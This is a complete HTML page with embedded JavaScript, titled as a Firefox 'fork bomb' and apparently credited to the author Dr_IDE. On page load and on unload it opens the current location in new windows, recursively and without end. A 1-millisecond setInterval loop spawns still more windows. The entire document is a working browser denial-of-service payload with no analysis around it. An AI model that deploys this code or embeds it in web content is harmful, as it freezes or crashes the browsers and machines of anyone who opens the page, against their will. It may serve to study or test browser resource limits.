<html>
<script>
var a = ('javascript:"<html><head><title>Dr_IDE\s FireFox Fork Bomb!</title></head><body onunload=\\"javascript:window.open(window.location);window.open(window.location)\\" onload=\\"javascript:window.open(window.location);window.open(window.location)\\"></body></html>"');
loop1();
  
function loop1()
{
    window.open(a);
    setInterval(loop1,1);
}
</script>
<body onload="javascript:loop1()"></body>
</html>